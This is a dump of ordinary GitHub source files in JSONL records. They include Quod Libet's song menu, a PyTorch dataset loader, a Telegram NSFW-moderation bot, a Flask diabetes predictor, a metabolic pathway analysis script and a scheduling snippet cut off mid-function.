context)\n\n@login_required(login_url=\"login\")\n@utils.group_unrequired(group_name=\"Verified\", redirect_url=\"tasks\")\ndef resend_verification(request: HttpRequest):\n if(request.method == \"POST\"):\n validation: models.UserValidation = utils.get_validation(request.user)\n if(validation is not None and validation.expired(1)):\n validation.generate_new_code()\n utils.send_verify_email(request, validation)\n\n return redirect(\"verify\")","repo_name":"Zantron2000/ToDoList","sub_path":"ToDoList/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74991357811","text":"from gi.repository import Gtk\n\nfrom quodlibet.formats import AudioFile\nfrom quodlibet.plugins.gui import MenuItemPlugin\nfrom quodlibet.plugins.songshelpers import is_a_file\nfrom quodlibet.qltk.chooser import choose_folders\nfrom quodlibet.qltk.download import DownloadProgress\nfrom quodlibet.qltk.pluginwin import PluginWindow\n\nfrom quodlibet import ngettext, _, print_d, app, util\nfrom quodlibet import qltk\nfrom quodlibet.errorreport import errorhook\nfrom quodlibet.qltk.showfiles import show_songs\n\nfrom quodlibet.util import print_e, print_w, copool\nfrom quodlibet.qltk.msg import ConfirmationPrompt, ErrorMessage, Message\nfrom quodlibet.qltk.delete import TrashMenuItem, trash_songs\nfrom quodlibet.qltk.information import Information\nfrom quodlibet.qltk.properties import SongProperties\nfrom quodlibet.qltk.x import SeparatorMenuItem\nfrom quodlibet.qltk.ratingsmenu import RatingsMenuItem\nfrom quodlibet.qltk import get_top_parent, get_menu_item_top_parent, Icons\nfrom quodlibet.plugins import PluginManager, PluginHandler\nfrom quodlibet.plugins.songsmenu import SongsMenuPlugin\nfrom quodlibet.util.songwrapper import list_wrapper, check_wrapper_changed\n\n\ndef confirm_song_removal_invoke(parent, songs):\n songs = set(songs)\n if not songs:\n return True\n\n count = len(songs)\n song = next(iter(songs))\n if count == 1:\n title = _('Remove track: \"%(title)s\" from the library?') % {\n \"title\": song(\"title\") or song(\"~basename\")}\n else:\n title = _(\"Remove %(count)d tracks from the library?\") % {\n \"count\": count}\n\n prompt = ConfirmationPrompt(parent, title, \"\", _(\"Remove from Library\"),\n ok_button_icon=Icons.LIST_REMOVE)\n return prompt.run() == ConfirmationPrompt.RESPONSE_INVOKE\n\n\ndef confirm_multi_song_invoke(parent, plugin_name, count):\n \"\"\"Dialog to confirm invoking a plugin with X songs in case X is high\"\"\"\n title = ngettext('Run the plugin \"%(name)s\" on %(count)d song?',\n 'Run the plugin \"%(name)s\" on %(count)d songs?',\n count) % {\"name\": plugin_name, \"count\": count}\n description = \"\"\n ok_text = _(\"_Run Plugin\")\n prompt = ConfirmationPrompt(parent, title, description, ok_text).run()\n return prompt == ConfirmationPrompt.RESPONSE_INVOKE\n\n\ndef confirm_multi_album_invoke(parent, plugin_name, count):\n \"\"\"Dialog to confirm invoking a plugin with X albums in case X is high\"\"\"\n title = ngettext('Run the plugin \"%(name)s\" on %(count)d album?',\n 'Run the plugin \"%(name)s\" on %(count)d albums?',\n count) % {\"name\": plugin_name, \"count\": count}\n description = \"\"\n ok_text = _(\"_Run Plugin\")\n prompt = ConfirmationPrompt(parent, title, description, ok_text).run()\n return prompt == ConfirmationPrompt.RESPONSE_INVOKE\n\n\nclass SongsMenuPluginHandler(PluginHandler):\n\n def __init__(self, song_confirmer=None, album_confirmer=None):\n \"\"\"custom confirmers for testing\"\"\"\n\n self.__plugins = []\n\n self._confirm_multiple_songs = confirm_multi_song_invoke\n if song_confirmer is not None:\n self._confirm_multiple_songs = song_confirmer\n\n self._confirm_multiple_albums = confirm_multi_album_invoke\n if album_confirmer is not None:\n self._confirm_multiple_albums = album_confirmer\n\n def Menu(self, library, songs):\n songs = list_wrapper(songs)\n\n attrs = [\"plugin_song\", \"plugin_songs\",\n \"plugin_album\", \"plugin_albums\"]\n\n if len(songs) == 1:\n attrs.append(\"plugin_single_song\")\n\n last = (songs and songs[-1]) or None\n for song in songs:\n if song.album_key != last.album_key:\n break\n last = song\n else:\n attrs.append(\"plugin_single_album\")\n\n items = []\n kinds = self.__plugins\n kinds.sort(key=lambda plugin: plugin.PLUGIN_ID)\n for Kind in kinds:\n usable = any(callable(getattr(Kind, s)) for s in attrs)\n if usable:\n try:\n items.append(Kind(songs, library))\n except Exception:\n print_e(\"Couldn't initialise song plugin %s. Stack trace:\"\n % Kind)\n errorhook()\n items = [i for i in items if i.initialized]\n\n if items:\n menu = Gtk.Menu()\n for item in items:\n try:\n menu.append(item)\n args = (library, songs)\n if item.get_submenu():\n for subitem in item.get_submenu().get_children():\n subitem.connect(\n \"activate\", self.__on_activate, item, *args)\n else:\n item.connect(\n \"activate\", self.__on_activate, item, *args)\n except Exception:\n errorhook()\n item.destroy()\n menu.append(SeparatorMenuItem())\n prefs = Gtk.MenuItem(label=_(\"Configure Plugins…\"))\n prefs.connect(\"activate\", lambda _: PluginWindow().show())\n menu.append(prefs)\n\n else:\n menu = None\n return menu\n\n def __get_albums(self, songs):\n albums = {}\n for song in songs:\n key = song.album_key\n if key not in albums:\n albums[key] = []\n albums[key].append(song)\n\n albums = list(albums.values())\n for album in albums:\n album.sort()\n return albums\n\n def handle(self, plugin_id, library, parent, songs):\n \"\"\"Start a song menu plugin directly without a menu\"\"\"\n\n parent = get_top_parent(parent)\n\n for plugin in self.__plugins:\n if plugin.PLUGIN_ID == plugin_id:\n songs = list_wrapper(songs)\n try:\n plugin = plugin(songs, library)\n except Exception:\n errorhook()\n else:\n self.__handle(plugin, plugin, library, songs, parent)\n return\n\n def __on_activate(self, item, plugin, library, songs):\n parent = get_menu_item_top_parent(item)\n self.__handle(item, plugin, library, songs, parent)\n\n def __handle(self, item, plugin, library, songs, parent):\n if len(songs) == 0:\n return\n\n try:\n if len(songs) == 1 and callable(plugin.plugin_single_song):\n try:\n ret = plugin.plugin_single_song(songs[0])\n except Exception:\n errorhook()\n else:\n if ret:\n return\n if callable(plugin.plugin_song):\n total = len(songs)\n if total > plugin.MAX_INVOCATIONS:\n if not self._confirm_multiple_songs(\n parent, plugin.PLUGIN_NAME, total):\n return\n\n try:\n ret = map(plugin.plugin_song, songs)\n except Exception:\n errorhook()\n else:\n if any(ret):\n return\n if callable(plugin.plugin_songs):\n try:\n ret = plugin.plugin_songs(songs)\n except Exception:\n errorhook()\n else:\n if ret:\n return\n\n if plugin.handles_albums:\n albums = self.__get_albums(songs)\n total = len(albums)\n if total > plugin.MAX_INVOCATIONS:\n if not self._confirm_multiple_albums(\n parent, plugin.PLUGIN_NAME, total):\n return\n\n if callable(plugin.plugin_single_album) and len(albums) == 1:\n try:\n ret = plugin.plugin_single_album(albums[0])\n except Exception:\n errorhook()\n else:\n if ret:\n return\n if callable(plugin.plugin_album):\n try:\n ret = map(plugin.plugin_album, albums)\n except Exception:\n errorhook()\n else:\n if any(ret):\n return\n if callable(plugin.plugin_albums):\n try:\n ret = plugin.plugin_albums(albums)\n except Exception:\n errorhook()\n else:\n if ret:\n return\n\n finally:\n check_wrapper_changed(library, filter(None, songs))\n\n def plugin_handle(self, plugin):\n return issubclass(plugin.cls, SongsMenuPlugin)\n\n def plugin_enable(self, plugin):\n self.__plugins.append(plugin.cls)\n\n def plugin_disable(self, plugin):\n self.__plugins.remove(plugin.cls)\n\n\nclass SongsMenu(Gtk.Menu):\n plugins = SongsMenuPluginHandler()\n\n @classmethod\n def init_plugins(cls):\n PluginManager.instance.register_handler(cls.plugins)\n\n def __init__(self, library, songs, plugins=True, playlists=True, queue=True,\n remove=True, delete=False, edit=True, info=True, ratings=True,\n show_files=True, download=False, items=None, accels=True,\n removal_confirmer=None, folder_chooser=None):\n super().__init__()\n # The library may actually be a librarian; if it is, use it,\n # otherwise find the real librarian.\n librarian = getattr(library, \"librarian\", library)\n\n if ratings:\n ratings_item = RatingsMenuItem(songs, librarian)\n ratings_item.set_sensitive(bool(songs))\n self.append(ratings_item)\n self.separate()\n\n # external item groups\n for subitems in reversed(items or []):\n self.separate()\n for item in subitems:\n self.append(item)\n self.separate()\n\n if plugins:\n submenu = self.plugins.Menu(librarian, songs)\n if submenu is not None:\n b = qltk.MenuItem(_(\"_Plugins\"), Icons.SYSTEM_RUN)\n b.set_sensitive(bool(songs))\n self.append(b)\n b.set_submenu(submenu)\n self.append(SeparatorMenuItem())\n\n in_lib = True\n can_add = True\n is_file = True\n for song in songs:\n if song not in library:\n in_lib = False\n if not song.can_add:\n can_add = False\n if not song.is_file:\n is_file = False\n\n if playlists:\n self.init_playlists(can_add, library, songs)\n if queue:\n self.init_queue(accels, can_add, songs)\n\n if remove or delete:\n self.separate()\n\n if remove:\n self.init_remove(in_lib, library, removal_confirmer, remove, songs)\n\n if delete:\n self.init_delete(accels, delete, is_file, songs, librarian)\n\n if edit:\n self.init_edit(accels, songs, librarian)\n\n if info:\n self.init_info(accels, songs, librarian)\n\n if show_files and any(is_a_file(s) for s in songs):\n self.init_show_files(songs)\n\n if download:\n self.init_download(songs, folder_chooser)\n\n def selection_done_cb(menu):\n menu.destroy()\n\n self.connect(\"selection-done\", selection_done_cb)\n\n def init_download(self, songs, folder_chooser):\n def is_downloadable(song: AudioFile):\n return bool(not song.is_file and song.get(\"~uri\", False))\n\n self.separate()\n relevant = [s for s in songs if is_downloadable(s)]\n total = len(relevant)\n text = ngettext(\n \"_Download file…\",\n \"_Download %(total)d files…\", total) % {\"total\": total}\n b = qltk.MenuItem(text, Icons.EMBLEM_DOWNLOADS)\n b.set_sensitive(relevant\n and len(relevant) < MenuItemPlugin.MAX_INVOCATIONS)\n\n def _finished(p, successes, failures):\n msg = (f\"{util.bold(successes)} \" + _(\"successful\") +\n f\"\\n{util.bold(failures)} \" + _(\"failed\"))\n print_d(msg.replace(\"\\n\", \"; \"))\n warning = Message(Gtk.MessageType.INFO, app.window,\n _(\"Downloads complete\"), msg, escape_desc=False)\n warning.run()\n\n def download_cb(menu_item):\n songs = relevant\n total = len(songs)\n msg = ngettext(\"Download {name!r} to\",\n \"Download {total} files to\",\n total)\n msg = msg.format(name=next(iter(songs))(\"title\")[:99] if total else \"?\",\n total=total)\n chooser = folder_chooser or choose_folders\n paths = chooser(None, msg, _(\"Download here\"), allow_multiple=False)\n if not paths:\n print_d(\"Cancelling download\")\n return\n path = paths[0]\n progress = DownloadProgress(songs)\n\n progress.connect(\"finished\", _finished)\n copool.add(progress.download_songs, path)\n\n b.connect(\"activate\", download_cb)\n self.append(b)\n\n def init_show_files(self, songs):\n def show_files_cb(menu_item):\n print_d(\"Trying to show files...\")\n if not show_songs(songs):\n parent = get_menu_item_top_parent(menu_item)\n msg = ErrorMessage(parent,\n _(\"Unable to show files\"),\n _(\"Error showing files, \"\n \"or no program available to show them.\"))\n msg.run()\n\n self.separate()\n total = len([s for s in songs if is_a_file(s)])\n text = ngettext(\n \"_Show in File Manager\",\n \"_Show %(total)d Files in File Manager\", total) % {\"total\": total}\n b = qltk.MenuItem(text, Icons.DOCUMENT_OPEN)\n b.set_sensitive(bool(songs)\n and len(songs) < MenuItemPlugin.MAX_INVOCATIONS)\n b.connect(\"activate\", show_files_cb)\n self.append(b)\n\n def init_info(self, accels, songs, librarian):\n b = qltk.MenuItem(_(\"_Information\"), Icons.DIALOG_INFORMATION)\n b.set_sensitive(bool(songs))\n if accels:\n qltk.add_fake_accel(b, \"<Primary>I\")\n\n def information_cb(menu_item):\n parent = get_menu_item_top_parent(menu_item)\n window = Information(librarian, songs, parent)\n window.show()\n\n b.connect(\"activate\", information_cb)\n self.append(b)\n\n def init_edit(self, accels, songs, librarian):\n self.separate()\n b = qltk.MenuItem(_(\"Edit _Tags\"), Icons.EDIT)\n b.set_sensitive(bool(songs))\n if accels:\n qltk.add_fake_accel(b, \"<alt>Return\")\n\n def song_properties_cb(menu_item):\n parent = get_menu_item_top_parent(menu_item)\n window = SongProperties(librarian, songs, parent)\n window.show()\n\n b.connect(\"activate\", song_properties_cb)\n self.append(b)\n\n def init_delete(self, accels, delete, is_file, songs, librarian):\n if callable(delete):\n b = qltk.MenuItem(_(\"_Delete\"), Icons.EDIT_DELETE)\n b.connect(\"activate\", lambda item: delete(songs))\n if accels:\n qltk.add_fake_accel(b, \"<Primary>Delete\")\n else:\n b = TrashMenuItem()\n if accels:\n qltk.add_fake_accel(b, \"<Primary>Delete\")\n\n def trash_cb(item):\n parent = get_menu_item_top_parent(item)\n trash_songs(parent, songs, librarian)\n\n b.connect(\"activate\", trash_cb)\n b.set_sensitive(is_file and bool(songs))\n self.append(b)\n\n def init_remove(self, in_lib, library, removal_confirmer, remove, songs):\n self._confirm_song_removal = (removal_confirmer or\n confirm_song_removal_invoke)\n b = qltk.MenuItem(_(\"_Remove from Library…\"), Icons.LIST_REMOVE)\n if callable(remove):\n b.connect(\"activate\", lambda item: remove(songs))\n else:\n def remove_cb(item, songs, library):\n parent = get_menu_item_top_parent(item)\n if self._confirm_song_removal(parent, songs):\n library.remove(songs)\n\n b.connect(\"activate\", remove_cb, songs, library)\n b.set_sensitive(in_lib and bool(songs))\n self.append(b)\n\n def init_queue(self, accels, can_add, songs):\n b = qltk.MenuItem(_(\"Add to _Queue\"), Icons.LIST_ADD)\n\n def enqueue_cb(item, songs):\n songs = [s for s in songs if s.can_add]\n if songs:\n from quodlibet import app\n app.window.playlist.enqueue(songs)\n\n b.connect(\"activate\", enqueue_cb, songs)\n if accels:\n qltk.add_fake_accel(b, \"<Primary>Return\")\n self.append(b)\n b.set_sensitive(can_add and bool(songs))\n\n def init_playlists(self, can_add, library, songs):\n try:\n from quodlibet.browsers.playlists.menu import PlaylistMenu\n submenu = PlaylistMenu(songs, library.playlists)\n except AttributeError as e:\n print_w(\"Couldn't get Playlists menu: %s\" % e)\n else:\n b = qltk.MenuItem(_(\"Play_lists\"), Icons.FOLDER_DRAG_ACCEPT)\n b.set_sensitive(can_add and bool(songs))\n b.set_submenu(submenu)\n self.append(b)\n\n def separate(self):\n if not self.get_children():\n return\n elif not isinstance(self.get_children()[-1], Gtk.SeparatorMenuItem):\n self.append(SeparatorMenuItem())\n\n def preseparate(self):\n if not self.get_children():\n return\n elif not isinstance(self.get_children()[0], Gtk.SeparatorMenuItem):\n self.prepend(SeparatorMenuItem())\n","repo_name":"quodlibet/quodlibet","sub_path":"quodlibet/qltk/songsmenu.py","file_name":"songsmenu.py","file_ext":"py","file_size_in_byte":18241,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"} +{"seq_id":"36101739801","text":"from torch.utils.data import DataLoader,Dataset\nfrom utils.get_aug import load_iamge\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self,datadir_path,path,img_width,img_height,load_img,aug):\n self.datadir_path = datadir_path\n self.path = path\n self.img_width = img_width\n self.img_height = img_height\n self.aug = aug\n self.load_img = load_img\n\n # self.img_formats = ['bmp', 'jpg', 'jpeg', 'png']\n fp = open(self.path, 'r')\n images = []\n labels = []\n for line in fp:\n line.strip('\\n')\n line.rstrip()\n information = line.split()\n images.append(self.datadir_path+'/'+information[0])\n labels.append(int(information[1]))\n self.images = images\n self.labels = labels\n\n\n def __getitem__(self, index):\n iamge_path = self.images[index]\n label = self.labels[index]\n image = self.load_img(iamge_path)\n image = image.resize((self.img_width,self.img_height))\n\n if self.aug:\n image = self.aug(image)\n else:\n pass\n return image,label\n\n\n def __len__(self):\n return len(self.images)\n\n\n\nif __name__ == '__main__':\n train_data_dir = 'Oxford_102_Flowers/data/oxford-102-flowers/train.txt'\n val_data_dir = 'Oxford_102_Flowers/data/oxford-102-flowers/valid.txt'\n datadir_path = 'Oxford_102_Flowers/data/oxford-102-flowers'\n train_dataset = ClassificationDataset(datadir_path,train_data_dir,320,320,aug=data_transforms('train'),load_img=load_iamge)\n val_dataset = ClassificationDataset(datadir_path,val_data_dir,320,320,aug=data_transforms('val'),load_img=load_iamge)\n train_loader = DataLoader(train_dataset, batch_size=16, shuffle=True)\n val_loader = DataLoader(val_dataset, batch_size=16, shuffle=False)\n print(train_dataset.__getitem__(0))\n print(val_dataset.__getitem__(0))\n print(train_dataset.__len__())\n print(val_dataset.__len__())","repo_name":"zgzqzzz/classification-models-pytorch","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"31284471659","text":"def user_data(name, surname, birth_year, city, email, phone):\n print('Имя: ', name, 'Фамилия: ', surname, 'Год рождения: ', birth_year,\n 'Город: ', city, 'Почта: ', email, 'Телефон: ', phone)\n\nname = input('Введите имя: ')\nsurname = input('Введите фамилию: ')\nbirth_year = input('Год рождения: ')\ncity = input('Город: ')\nemail = input('Почта: ')\nphone = input('Телефон: ')\n\nuser_data(name, surname, birth_year, city, email, phone)","repo_name":"wellmak7/homework_3","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37044496203","text":"from DRG import *\r\nfrom itertools import combinations\r\nimport numpy as np\r\nimport pandas as pd\r\nimport time\r\n\r\ntiempo0 = time.process_time()\r\n\r\n# Con un fichero con la matriz de reacciones, extraer la lista de reacciones y la lista de EFMs por separado.\r\nnombresReacciones, listaEFMs = FicheroMatriz(\"EFMsEColi.txt\")\r\n# Cálculo de todas las posibles combinaciones de implicaciones (a pares). El propio comando filtra las repeticiones en otro orden.\r\ncombinaciones= set(i for i in combinations(nombresReacciones,2))\r\n\r\ntiempo1 = time.process_time()\r\nprint(\"t1:\", tiempo1-tiempo0)\r\n\r\n# PRIMER RECORRIDO: IMPLICACIONES CLARAS EN PROPORCIONES TOTALES\r\n# Set para guardar las implicaciones\r\nimplicacionesPerfectas = set()\r\n\r\n# Calculamos con proporciones: si la proporción es idéntica con todos los decimales, se entiende que podría darse una implicación idéntica. Calculamos la longitud media y desviación de sus EFMs para confirmar.\r\n\r\n# SE CALCULA LA PROPORCIÓN EN LA QUE APARECE CADA REACCIÓN\r\nproporcionesTotal = CalculoProporciones(nombresReacciones, listaEFMs)\r\n\r\ntiempo2 = time.process_time()\r\nprint(\"t2:\",tiempo2-tiempo1)\r\n\r\n# Recorremos cada tupla de combinaciones posibles.\r\nfor i in combinaciones:\r\n # Barrido con las reacciones para asignar su índice en la lista de reacciones para usarlo en \"CalcularLongitud\"\r\n for ind, j in enumerate(nombresReacciones):\r\n if j == i[0]:\r\n i1 = ind\r\n if j == i[1]:\r\n i2 = ind\r\n\r\n # UNA VEZ ESTABLECEMOS EL PAR, SI COINCIDE EL % DE APARICIÓN DE AMBAS REACCIONES...\r\n if proporcionesTotal[i[0]] == proporcionesTotal[i[1]]:\r\n # Calculamos la longitud media y desviación típica para el listado de EFMs que SIEMPRE contienen la reacción concreta.\r\n l1 = CalcularLongitud(EFMsReaccion([i1],listaEFMs)[0])\r\n l2 = CalcularLongitud(EFMsReaccion([i2],listaEFMs)[0])\r\n\r\n # Si coinciden, guardamos la implicación como una perfecta. \r\n if np.mean(l1) == np.mean(l2) and np.std(l1) == np.std(l2):\r\n implicacionesPerfectas.add(i)\r\n\r\ntiempo3 = time.process_time()\r\nprint(\"t3:\",tiempo3-tiempo2)\r\n\r\n# Ahora, combinamos con una función recursiva de modo que todas las implicaciones perfectas se guarden como bloques, en vez de como pares.\r\nbloquesImplicacionesPerfectas = CombinarAcoplamiento(BarridoAcoplamientos(implicacionesPerfectas))\r\n\r\n\r\n\r\n# Escritura de estos resultados en el fichero.\r\nwith open(\"ImplicacionesAcoplamientosNuevo.txt\",\"w\") as fichero:\r\n fichero.write(\"Estos son todos los bloques de implicaciones perfectas encontrados.\")\r\n fichero.write(str(bloquesImplicacionesPerfectas))\r\n\r\ntiempo4 = time.process_time()\r\nprint(\"t4:\",tiempo4-tiempo3)\r\n\r\n# SEGUNDA PARTE: IMPLICACIONES PARCIALES Y NEGATIVAS\r\n\r\n# Primero separamos los pares ya resueltos del resto para ahorrar recursos computacionales en posteriores procedimientos.\r\ncombinaciones2 = []\r\nfor i in combinaciones:\r\n if i not in implicacionesPerfectas:\r\n combinaciones2.append(i)\r\n\r\ntiempo5 = time.process_time()\r\nprint(\"t5:\",tiempo5-tiempo4)\r\n\r\n# Ahora, comenzamos calculando las implicaciones negativas, al ser más fáciles.\r\n# Para cada reacción, calculamos la lista de EFMs que la contienen SIEMPRE, y entonces, la proporción en la que aparecen el resto de reacciones. \r\n# Si la proporción es 0, se trata de una implicación negativa (nunca aparecen juntas) y forman parte de su propia lista.\r\n\r\nparesNegativas = []\r\nparesParciales = []\r\n\r\n# Recorriendo el listado de combinaciones...\r\nfor i in combinaciones2:\r\n # Barrido para establecer los índices respectivos en la lista de reacciones y así funcionar con los EFMs.\r\n for ind, j in enumerate(nombresReacciones):\r\n if j == i[0]:\r\n i1 = ind\r\n if j == i[1]:\r\n i2 = ind\r\n\r\n # Calculamos los EFMs en los que aparece la reacción en la posición 1\r\n EFMs1 = EFMsReaccion([i1], listaEFMs)[0]\r\n # La proporción (nº EFMs en los que aparece R2)\r\n # Si la proporción es 0, es un par de implicación negativa.\r\n if ProporcionesDiana(i2, EFMs1) == 0:\r\n paresNegativas.append(i)\r\n # Si el nº de EFMs es total (100%), como la lista excluye acoplamientos perfectos, es un par parcial.\r\n elif ProporcionesDiana(i2, EFMs1) == len(EFMs1):\r\n paresParciales.append(i)\r\n else:\r\n # Si no casa de ninguna otra, manejamos la inversa: calculamos los EFMs en los que aparece R1 frente al listado de EFMs que siempre incluyen R2, para ver si hay un par parcial.\r\n\r\n EFMs2 = EFMsReaccion([i2], listaEFMs)[0]\r\n if ProporcionesDiana(i1, EFMs2) == len(EFMs2):\r\n paresParciales.append(i)\r\n\r\nwith open(\"ImplicacionesAcoplamientosNuevo.txt\",\"a\") as fichero:\r\n fichero.write(\"\\nEstos son todos los pares de implicaciones negativas encontrados.\\n\")\r\n fichero.write(str(paresNegativas))\r\n fichero.write(\"\\n\\n\")\r\n fichero.write(\"\\nEstos son todos los pares de implicaciones parciales encontrados.\\n\")\r\n fichero.write(str(paresParciales))\r\n\r\ntiempo6 = time.process_time()\r\nprint(\"t6:\",tiempo6-tiempo5)","repo_name":"Guillamoto/TFM-tools","sub_path":"calculoAcoplamientosNuevo.py","file_name":"calculoAcoplamientosNuevo.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10303499323","text":"\"\"\"Added device_type_id to devices table\n\nRevision ID: e31f36de8dc0\nRevises: 842769c19c90\nCreate Date: 2020-07-13 13:00:00\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'e31f36de8dc0'\ndown_revision = '842769c19c90'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('devices', sa.Column('device_type_id', sa.Integer(), nullable=True))\n op.create_foreign_key(op.f('fk_devices_device_type_id_device_type'), 'devices', 'device_type', ['device_type_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(op.f('fk_devices_device_type_id_device_type'), 'devices', type_='foreignkey')\n op.drop_column('devices', 'device_type_id')\n # ### end Alembic commands ###\n","repo_name":"mywork-dragon/dave-energy","sub_path":"migrations/versions/e31f36de8dc0_added_device_type_id_to_devices_table.py","file_name":"e31f36de8dc0_added_device_type_id_to_devices_table.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74206102134","text":"from pyrogram import Client, filters, enums\r\nimport requests\r\nimport sqlite3\r\nimport os\r\n\r\napi_id = os.getenv(\"API_ID\")\r\napi_hash = os.getenv(\"API_HASH\")\r\nbot_token = os.getenv(\"BOT_TOKEN\")\r\napi_url = os.getenv(\"API_URL\")\r\n\r\napp = Client(\"my_bot\", api_id=api_id, api_hash=api_hash, bot_token=bot_token)\r\n\r\nconn = sqlite3.connect('settings.db')\r\nc = conn.cursor()\r\n\r\n# Create the settings table if it doesn't exist\r\nc.execute('''\r\n CREATE TABLE IF NOT EXISTS settings (\r\n chat_id INTEGER PRIMARY KEY,\r\n blur_images BOOLEAN\r\n )\r\n''')\r\nconn.commit()\r\n\r\ndef send_image(file_path, api_url):\r\n with open(file_path, 'rb') as r:\r\n image = r.read()\r\n r.close()\r\n req = requests.post(api_url, image).json()\r\n if req['code'] != 200:\r\n return 'Error:', req['msg']\r\n else:\r\n reqData = req['data']\r\n if 'Hentai' in reqData and reqData['Hentai'] > 30:\r\n return 'pron'\r\n elif 'Porn' in reqData and reqData['Porn'] > 30:\r\n return 'pron'\r\n else:\r\n return None\r\n\r\n@app.on_message(filters.command(\"toggle_spoiler\"))\r\nasync def toggle_spoiler(client, message):\r\n admins = []\r\n async for m in client.get_chat_members(message.chat.id, filter=enums.ChatMembersFilter.ADMINISTRATORS):\r\n admins.append(m.user.id)\r\n \r\n if message.from_user.id not in admins:\r\n return\r\n\r\n c.execute('SELECT blur_images FROM settings WHERE chat_id = ?', (message.chat.id,))\r\n row = c.fetchone()\r\n if row is None:\r\n blur_images = True\r\n c.execute('INSERT INTO settings VALUES (?, ?)', (message.chat.id, blur_images))\r\n else:\r\n blur_images = not row[0]\r\n c.execute('UPDATE settings SET blur_images = ? WHERE chat_id = ?', (blur_images, message.chat.id))\r\n conn.commit()\r\n\r\n await message.reply(f\"打码模式, {'开启' if blur_images else '关闭'}.\")\r\n\r\n@app.on_message(filters.photo)\r\nasync def download_photo(client, message):\r\n file_path = await message.download(\"downloads/\")\r\n response = send_image(file_path, api_url)\r\n\r\n if response == \"pron\": \r\n await client.delete_messages(\r\n chat_id=message.chat.id,\r\n message_ids=message.id,\r\n )\r\n \r\n c.execute('SELECT blur_images FROM settings WHERE chat_id = ?', (message.chat.id,))\r\n row = c.fetchone()\r\n blur_images = row[0] if row is not None else False\r\n\r\n try:\r\n if blur_images:\r\n await client.send_photo(\r\n chat_id=message.chat.id,\r\n photo=file_path,\r\n caption=\"内容可能是NSFW\",\r\n has_spoiler=True,\r\n )\r\n except Exception as e:\r\n await message.reply(f\"Error: {e}\")\r\n\r\napp.run()","repo_name":"qi-mooo/telegram_nsfw_check_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40803542468","text":"from flask import Flask, render_template, request, jsonify\nimport joblib\n\napp = Flask(__name__)\n\n\ndef diabetes_predict(algo, preg, glucose, bp, st, insulin, bmi, dpf, age):\n \"\"\"\n It takes in the name of the algorithm, and the features of the patient, and returns the prediction\n of the model\n \n :param algo: The algorithm to use for prediction\n :param preg: Number of times pregnant\n :param glucose: Plasma glucose concentration a 2 hours in an oral glucose tolerance test\n :param bp: Blood pressure\n :param st: Skin Thickness\n :param insulin: 2-Hour serum insulin (mu U/ml)\n :param bmi: Body mass index\n :param dpf: Diabetes Pedigree Function\n :param age: Age (years)\n :return: The prediction of the model.\n \"\"\"\n data = [[preg, glucose, bp, st, insulin, bmi, dpf, age]]\n print(data)\n if algo == \"knn\":\n model = joblib.load(\"models/knn_diabetes.pkl\")\n prediction = model.predict(data)\n return int(prediction[0])\n elif algo == \"naive\":\n model = joblib.load(\"models/nb_diabetes.pkl\")\n prediction = model.predict(data)\n return int(prediction[0])\n else:\n return \"Please select a valid algorithm\"\n\n\n@app.route('/')\ndef knn():\n \"\"\"\n It renders the home.html file.\n :return: The render_template function is being returned.\n \"\"\"\n return render_template('home.html')\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n \"\"\"\n It takes the values from the form and passes them to the diabetes_predict function\n :return: a jsonfield dictionary.\n \"\"\"\n if request.method == \"POST\":\n # get body parameters\n algo = request.json['algo']\n preg = int(request.json['preg'])\n glucose = int(request.json['glucose'])\n bp = int(request.json['bp'])\n st = int(request.json['st'])\n insulin = int(request.json['insulin'])\n bmi = float(request.json['bmi'])\n dpf = float(request.json['dpf'])\n age = int(request.json['age'])\n\n try:\n prediction = diabetes_predict(algo, preg, glucose, bp, st, insulin, bmi, dpf, age)\n\n return jsonify({\n \"prediction\": prediction\n })\n except ValueError:\n return jsonify({\n \"error\": \"Please enter valid values\"\n })\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"hiskiapp/diabetes-prediction-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888475252","text":"\"\"\"\nschedules represent for meetings j for employee i\nadd a new meeting of length l for all employees when they can all attend\nreturn the earliest start time for the mew meeting\nthe new meeting must end before 24x60\n\nschedules = [[[60,150],[180,240]], [[0,210],[360,420]]]\nlength = 120\nres = 240\n\nschedules = [[[480,510]], [[240,330]], [[375,400]]]\nlength = 180\nres = 0\n\nschedules = [[],[],[]]\nlength = 75\nres = 0\n\nschedules = [[0,1439],[[0,390],[480,510]],[]]\nlength = 90\nres = -1\n\"\"\"\nimport heapq\ndef add_new_meeting_for_all(schedules, length):\n\tres = 0\n\th = []\n\tfor i in range(len(schedules)):\n\t\tif len(schedules[i]) == 0: # no meetings\n\t\t\tcontinue\n\t\telse:\n\t\t\theapq.heappush(h, (schedules[i][0], 0, i))\n\n\twhile h:\n\t\tt, j, i = heapq.heappop(h)\n\t\tif res + length <= t[0]: # next start time\n\t\t\treturn res\n\t\tres = max(res, t[1]) # next end time\n\t\t# push the next 